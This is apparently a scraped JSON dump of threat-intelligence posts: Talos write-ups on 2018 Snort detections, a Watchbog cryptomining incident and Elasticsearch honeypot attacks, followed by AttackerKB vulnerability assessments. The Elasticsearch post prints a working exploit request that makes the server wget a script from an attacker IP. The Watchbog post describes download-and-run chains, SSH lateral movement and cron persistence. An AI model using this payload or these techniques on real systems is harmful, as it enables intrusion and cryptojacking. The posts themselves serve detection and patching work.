Understanding why particular rules are triggered and how they can protect systems is a key part of network security. Snort rules can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated. \n \nAs the threat environment changes, it is necessary to ensure that the correct rules are in place protecting systems. Usually, this means ensuring that the most recent rule set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short. \n \nOur most commonly triggered rule in 2018: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices, no matter how small, are protected. \n \nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For a full understanding of the meaning of triggered detections it is important for the rules to be open source. Knowing what network content caused a rule to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection. 
\n \nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well as through the release of additional open-source tools and the detailing of attacks on our blog. \n \nYou can [subscribe](<https://www.snort.org/products>) to Talos' newest rule detection functionality for as low as $29 a year with a personal account. Be sure and see our business pricing for Snort as well [here](<https://snort.org/products%23rule_subscriptions>).", "cvss3": {}, "published": "2019-02-06T08:19:00", "type": "talosblog", "title": "2018 in Snort Rules", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11774", "CVE-2017-5638", "CVE-2017-9805"], "modified": "2019-02-12T14:15:53", "id": "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6rupY-noy3s/2018-in-snort-signatures.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-09-11T16:31:25", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1000861"], "description": "[](<https://1.bp.blogspot.com/-T6tAdLkCVaQ/XWY957W13BI/AAAAAAAABSk/k4c65smKUDc6_ojm0cR3sGDMB3jvU1LagCLcBGAs/s1600/image5.png>)\n\n_By [Luke DuCharme](<https://twitter.com/_nTr0py>) and [Paul Lee](<https://twitter.com/paulleeio>)._\n\n \n\n\n## What Happened?\n\n \nCisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog [cryptomining](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>) botnet. 
The attackers were able to exploit [CVE-2018-1000861](<https://jenkins.io/security/advisory/2018-12-05/>) to gain a foothold and install the [Watchbog](<https://www.bleepingcomputer.com/news/security/bluekeep-scanner-discovered-in-watchbog-cryptomining-malware/>) malware on the affected systems. \n \nThis Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker's intentions and abilities on a customer's network by analyzing the various Pastebins. As the investigation progressed, CSIRS identified and de-obfuscated multiple pastes using artifacts left on compromised hosts. \n \nThere were some attempts at obfuscation, such as base64 encoding URLs and Pastebins, but the attack was still relatively simple to uncover - this attacker did not practice particularly strong operational security. \n \nThe attackers behind Watchbog claimed to be providing a service by identifying security vulnerabilities and aiding the organization by exploiting said weaknesses before any \"real\" hackers could do so. During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the \"positive\" intentions of this adversary. Below is a message left on a compromised system by the adversary: \n \n \n\n\n[](<https://1.bp.blogspot.com/-ujTm3bnl6Y4/XXkIAdu_6hI/AAAAAAAACks/aoCA1ZLep9wEg5GhKjKVvWZ1K1xeMaqeQCLcBGAsYHQ/s1600/image5.png>)\n\n \n \n\n\n## What does Watchbog do? \n\n \nThe Watchbog botnet mines Monero cryptocurrency for its owners. While researching our variant we came across a [post](<https://www.alibabacloud.com/blog/return-of-watchbog-exploiting-jenkins-cve-2018-1000861_594798>) by Alibaba Cloud Security that provides some insights into Watchbog. This post coincided with our findings as we found an installation script that performs the following activities. 
\n \nFirst the installation script checks for running processes matching other cryptocurrency miners. If the system was previously configured to mine cryptocurrency, the installation script would terminate their execution using the kill command: \n \n\n\n[](<https://1.bp.blogspot.com/-A77Z058CSas/XXkIGxjwNUI/AAAAAAAACkw/LU4PzjqWeuUFTzi0ie-5HiUI9aqAvbX0gCLcBGAsYHQ/s1600/image19.png>)\n\n \n \n \nThe script then uses the touch command to determine its capability to write to various directories on the filesystem. \n \n\n\n[](<https://1.bp.blogspot.com/-hZreiq7fNuc/XXkIML9U97I/AAAAAAAACk0/3sYIcbzDfqwKO7yulMTA8cCO0AztQ9y2QCLcBGAsYHQ/s1600/image10.png>)\n\n \n \n \nIt also checks the architecture of the system to determine if it is executing on a 32-bit or 64-bit operating system and then makes three attempts to download and install a '[kerberods](<https://www.securityweek.com/jenkins-vulnerability-exploited-deliver-kerberods-malware>)' dropper using wget or curl. \n \n\n\n[](<https://1.bp.blogspot.com/-HPsroOq2qhA/XXkIQfB4zkI/AAAAAAAACk4/rsX2J_AT4QMKum9HYVpGSZllcOgdnJiDgCLcBGAsYHQ/s1600/image6.png>)\n\n \n \nDepending on permissions, the kerberods dropper is saved to one of the following directories: \n \n\n\n * The current working directory\n * /usr/bin\n * /usr/libexec\n * /usr/local/bin\n * /tmp\n * /usr/sbin\n \n \nThe script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information. CSIRS verified this as the same wallet ID as the one used by the attacker referenced in the Alibaba cloud post referenced earlier. \n \n\n\n[](<https://1.bp.blogspot.com/-h-5OOiEvD6E/XXkIVOCPzDI/AAAAAAAACk8/w64pGCY_Lu8_uETE9TIwJPdcz0U1BeqBACLcBGAsYHQ/s1600/image15.png>)\n\n \n \nThough the Pastebin URL in the previous screenshot is no longer accessible, the next step in the infection process is to download the cryptocurrency miner. 
We identified a script that 'kerberods' likely runs to reach out to GitHub to install the [XMR-Stak](<https://github.com/fireice-uk/xmr-stak>) Monero miner. \n \nThe main part of the script checks to see if a process called 'watchbog' is running. \n \n\n\n[](<https://1.bp.blogspot.com/-VwVkn4qRI_o/XXkIaqorPsI/AAAAAAAAClA/k_fDNgqtyPcLigl06zAGz_G7r8BqDgW2wCLcBGAsYHQ/s1600/image14.png>)\n\n \n \nIf the 'watchbog' process is not detected, the 'testa' or 'download' functions are called to install the version of the miner that's compatible with the host operating system and architecture and execute it to begin the mining process. \n \n\n\n[](<https://1.bp.blogspot.com/-by3LDE47GAs/XXkIfunS68I/AAAAAAAAClI/VPfDareDVrU8sqDw3zCfPrePM6I4GqaRwCLcBGAsYHQ/s1600/image16.png>)\n\n \n \n\n\n### 'Testa' function\n\n \nAs previously mentioned, the 'testa' function may be called to facilitate the infection process. Below is the code associated with this function. This code is responsible for writing the various configuration data used by the mining software. The function declares three variables and assigns base64 encoded data to each of them. \n \n\n\n[](<https://1.bp.blogspot.com/-TiGg3jydpBE/XXkIl9UjzpI/AAAAAAAAClU/UlvIXZKQwNscT8a8rOTwe9jtw54KI046wCLcBGAsYHQ/s1600/image18.png>)\n\n \n \nThe base64 encoded data is then decoded and written to various files. \n \n\n\n[](<https://1.bp.blogspot.com/-0T8gl-_prkE/XXkIqsy8W3I/AAAAAAAAClc/jxingEGh9NMTPJCXXZ5gQfhlQ9zOUZzbACLcBGAsYHQ/s1600/image17.png>)\n\n \n \nThe base64 encoded values correspond to the following: \n \n\n\n * St_64: This variable contains the URL of the Github repository that hosts the XMR-Stak mining client.\n * hXXps://github[.]com/fireice-uk/xmr-stak/releases/download/2.10.3/xmr-stak-linux-2.10.3-cpu.tar.xz \n \n \n\n\n * con_url: This variable contains the Pastebin URL that is used to host the configuration file for the mining client. 
\n * hXXps://pastebin[.]com/raw/YJH8sWr\n \n \n\n\n * Cpu_url: This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.\n * hXXps://pastebin[.]com/raw/irzk5mSh\n \n \n\n\n * poo_url: This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.\n * hXXps://pastebin[.]com/raw/aJkbTx6Y\n \n \nThe script then starts the Watchbog process and deletes the text file after downloading the encoded Pastebins as a text file and giving it execution permissions. The following screenshot shows the configuration file that is referenced by the con_url variable in the 'testa' function. \n \n\n\n[](<https://1.bp.blogspot.com/-xSeuN5oL4aY/XXkIxPOeUEI/AAAAAAAAClk/N635X8ceQ0IdzDY7GJTclbF4rBLEwDYvQCLcBGAsYHQ/s1600/image12.png>)\n\n \n \n\n\n### 'download' function\n\n \nThe following code is associated with the 'download' function referenced by the installation script previously described. Similar to what was described in the 'testa' function, it contains three declared variables with base64 encoded assignments. \n \n\n\n[](<https://1.bp.blogspot.com/-aqSmprNOZXk/XXkI2aAmTJI/AAAAAAAAClo/vtEn5t-UvDUoeNnUn4OPSW9fh8iooJYPwCLcBGAsYHQ/s1600/image13.png>)\n\n \n \nThese base64 encoded strings correspond to the following: \n \n\n\n * mi_64: This variable contains the Github URL that hosts the XMRig Monero mining client. \n * hXXps://github[.]com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz\n \n \n\n\n * mi_32: This variable contains a Pixeldrain URL. During our investigation the URL was no longer accessible. \n * hXXps://pixeldrain[.]com/api/file/ZuVWceWG\n \n \n\n\n * der_ke: This variable contains a Pastebin URL. 
The URL was used to host a file containing the attacker(s) Monero Wallet ID for the miner to use. This Wallet ID is used to facilitate payment to the attacker. All Monero successfully mined by clients under the attacker's control will transfer the Monero to the Wallet ID specified in this file. The same wallet is included in the Alibaba Cloud post mentioned earlier.\n * hXXps://pastebin[.]com/raw/hURdMBLd\n \n \nThe download function then writes the contents retrieved from the specified URLs to various file locations. It then determines the architecture of the system and installs the appropriate mining client and executes it to initiate the mining process. \n \n\n\n[](<https://1.bp.blogspot.com/-3AAGL4Enxgc/XXkI8suvJoI/AAAAAAAAClw/wOHkv6rtfYMf9hYBUf_qJJDNon6L4ixNgCLcBGAsYHQ/s1600/image2.png>)\n\n \n \n \nThe following screenshot contains the contents of the Monero wallet configuration associated with the der_ke variable in the 'download' function described earlier. It specifies the configuration parameters that will be used by the mining client, including the Wallet ID, mining pool URL, and other parameters that can be used to control CPU usage, logging, etc. \n \n\n\n[](<https://1.bp.blogspot.com/-f3DJaaFacSo/XXkJB_E7xYI/AAAAAAAACl0/DUEfC02BOTcFYExE4hGsDqyBd8Ek6ZuIgCLcBGAsYHQ/s1600/image8.png>)\n\n \n \n\n\n## Lateral movement via SSH\n\n \nCSIRS identified that the adversary was using SSH to spread laterally. Although local logs were unavailable, we were able to use network logs to gain an understanding of how the malware was spreading. As we viewed the logs, it was easy to determine Watchbog's lateral movement mechanism because they were generating a large amount of SSH traffic. This could have been easily detected using internal traffic flow monitoring, such as with StealthWatch Cloud or other netflow-monitoring capability. \n \nThe following Bash script was used to facilitate the lateral movement process. 
It retrieves the contents of the known_hosts file on the infected system and then attempts to SSH into those systems. It also checks for the existence of SSH keys and leverages them to authenticate to the systems in the known_hosts file. If successful, it will retrieve the contents of the Pastebin URL previously described and initiate the infection process. \n \n\n\n[](<https://1.bp.blogspot.com/-5_xBPPopbZI/XXkJHnWUv6I/AAAAAAAACl8/s2tHmsrtZzc4gFcIFC2qNU6x8WBtCV5EACLcBGAsYHQ/s1600/image3.png>)\n\n \n \n \n\n\n## Lateral movement via Jenkins and Redis servers\n\n \nIn addition to leveraging SSH for lateral movement, the Watchbog adversary also attempted to leverage a Python script that scans for open Jenkins and Redis ports on the host's subnet. If the script finds any vulnerable servers, it attempts to use the curl or wget commands to retrieve a payload from Pastebin and execute it on the target. \n \nBased on the following string on line 71, the script targets CVE-2018-1000861, a vulnerability in the Stapler web framework, which handles HTTP requests, for versions up to Jenkins 2.138.1 or 2.145. It can provide attackers with RCE through specially crafted URLs. A [post](<https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing-en/>) by Orange Tsai shows how to exploit this vulnerability by using cross-reference objects to bypass ACL policy. \n \n\n\n[](<https://1.bp.blogspot.com/-3TxIe0-nZsM/XXkJM986stI/AAAAAAAACmA/FgUyo8tO6YIEaZio5VFrJdNgEZtHrpA7gCLcBGAsYHQ/s1600/image7.png>)\n\n \n \nThough the pastes accessed in the script were no longer available, we believe the payload was the installation script for the XMR-Stak miner previously described. The following Python script is also downloaded and executed from the XMR-Stak miner script described above in a function called 'party.' 
\n \n\n\n[](<https://1.bp.blogspot.com/-yYGvHmNwIzs/XXkJRnRvBjI/AAAAAAAACmI/E_GktVykecAKBOY6JBO9E0arUg6-rkkPwCLcBGAsYHQ/s1600/image4.png>)\n\n \n \nAs can be seen above, the payload variable contains a base64 encoded blob which is then decoded, written to the /tmp directory and executed. This base64 encoded blob contains a Pastebin URL (hXXps://pastebin[.]com/raw/DzgYb9mu) which was used to host the following Python script. The Python script is used to facilitate the exploitation of the aforementioned vulnerability and initiate the infection process. The following screenshots are associated with this Python script. \n \n\n\n[](<https://1.bp.blogspot.com/-ffsJuwLdgf4/XXkJXUd3YgI/AAAAAAAACmQ/H4hum_c5VLwooskH2NtFwGmRRUGVB8qjwCLcBGAsYHQ/s1600/image21.png>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-e3bawStVKtA/XXkJcurJEqI/AAAAAAAACmY/kwJwp-GBGAA1fwJDVQLoIGSl0cxhp_pOQCLcBGAsYHQ/s1600/image1.png>)\n\n \n \n\n\n[](<https://1.bp.blogspot.com/-sMDwBEFIxqI/XXkJiHMLZlI/AAAAAAAACmg/FpktKT_qR9geHhpanXh4ElHHfWgwHu6agCLcBGAsYHQ/s1600/image20.png>)\n\n \n \n \n\n\n## Persistence\n\n \nWatchbog's main persistence mechanism appears to have been using cron jobs. Below is the 'system' function from the 'kerberods' installation script which ensures the dropper will call out to Pastebins every hour for new information. The below screenshot shows the way that Watchbog configures the cron jobs responsible for achieving persistence on infected systems. \n \n\n\n[](<https://1.bp.blogspot.com/-0tfsLV-3M3U/XXkJoO47SsI/AAAAAAAACmk/Zomf6H49VL8zFtlb6NEuLWVMc2ZLlhfaQCLcBGAsYHQ/s1600/image11.png>)\n\n \n \nIn a post by Renato Marinho from Morphus Labs, he mentions a very interesting way 'kerberods' achieves persistence as well. If it has root privileges, it will download and load a library into the operating system which hooks parts of Glibc to modify Glibc's behavior. 
The post also specifies that the hooks allow the miner to run as anyone (including root) and also obfuscates the network connection to the mining pool as well as the Redis/Jenkins server scans. \n \n\n\n## Covering their tracks\n\n \nEvidence deletion has been identified in previous Watchbog variants. The Watchbog variant in our incident continued this trend. Evidence deletion was performed in a clear manner with files and logs being deleted or overwritten. The evidence deletion was typically added to the end of a handful of the Pastebin scripts, with the Xmr-stak download and the SSH Lateral Movement scripts being prime examples. The loss of those key pieces of evidence made analysis difficult, but not impossible. We were able to rely upon our client's centralized logging to fill in those holes, and the hosts themselves still had evidence, the most obvious being the malware variants themselves. \n \n\n\n## Conclusion \n\n \nUnpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and network environment in which the web server is deployed. Once that foothold has been established, the attacker can then connect to their C2, achieve persistent long-term access to the environment and spread laterally \u2014 which is exactly what happened in this case. The best way to prevent such activity would be to ensure that all enterprise web applications are up to date. Patching can cause some operational gaps and delays, so it\u2019s also important to have a maintenance window and a test environment to ensure that the new patches do not cause any issues. Identifying cryptomining activity can be done effectively by following security fundamentals. Establish a baseline for internal network traffic and if any significant deviations occur, identify and investigate them, even if there is an existing theory for the activity. 
In this case, Watchbog generated a noticeable spike in the organization\u2019s SSH traffic. \n \n\n\n## Coverage\n\nIntrusion prevention systems such as [SNORT\u00ae](<https://snort.org/>) provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response (EDR) tools such as [Cisco AMP for Endpoints](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>), which gives users the ability to track process invocation and inspect processes. Try AMP for free [here](<http://cisco.com/go/tryamp>). \n \nAdditional ways our customers can detect and block these threats are listed below. \n \n\n\n[Screenshot](<https://1.bp.blogspot.com/-yUCBqjJUM8M/XVF7-jm_JLI/AAAAAAAAAT8/hhCfba_JHMUia21PuHBNSgH416W1Gc9KwCLcBGAs/s1600/image6.png>)\n\n \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. 
\n \nNetwork security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n\n\n## Indicators of Compromise (IOCs)\n\n \nThe following IOCs have been observed associated with Watchbog. 
\n \n\n\n### Hashes (SHA256):\n\n \nb383d0fdfa5036ccfa5d9c2b43cbfd814bce8778978873057b86678e5295fc61 0b0567c9b45ea0a3ea4267001f0760ccdf2b8224fceaf8979d32fcceb2d6fb7a \n \n3A6271A90D0F6CC8A2D31D45D931E8401F13F7377932BA07D871DC42F252B9CA \n \n\n\n### Domains:\n\n \naziplcr72qjhzvin[.]onion[.]to \n \n\n\n### Misc:\n\n \nMonero Wallet (Same wallet as the Alibaba Cloud Post) \n \n47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 \n \n", "modified": "2019-09-11T09:10:37", "published": "2019-09-11T09:10:37", "id": "TALOSBLOG:C136648C951F9482ABC1764BDBCABCC9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/peidHg1L8SY/watchbog-patching.html", "type": "talosblog", "title": "Watchbog and the Importance of Patching", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-03-01T16:16:02", "description": "__ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. 
\n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. 
The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in Elasticsearch error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. 
\n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. 
These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. 
\n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n \n\n\n", "cvss3": {}, "published": "2019-02-26T10:56:00", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "modified": "2019-03-01T15:56:50", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "attackerkb": [{"lastseen": "2023-10-18T16:44:49", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. 
Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", 
"CVE-2019-0230"], "modified": "2023-10-07T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:15:46", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 02, 2020 12:18am UTC reported:\n\nWell, it\u2019s bad when even _Oracle_ decides to [raise the alarm bells](<https://blogs.oracle.com/security/apply-april-2020-cpu>) (wayback machine was down, so no permalink yet) about it.\n\nThey\u2019ve detected active exploitation attempts against WebLogic servers.\n\nT3 is Weblogic\u2019s proprietary implementation of the RMI spec and is primarily used as a layer to enable JNDI calls by apps/clients.\n\nIt appears there\u2019s [PoC for 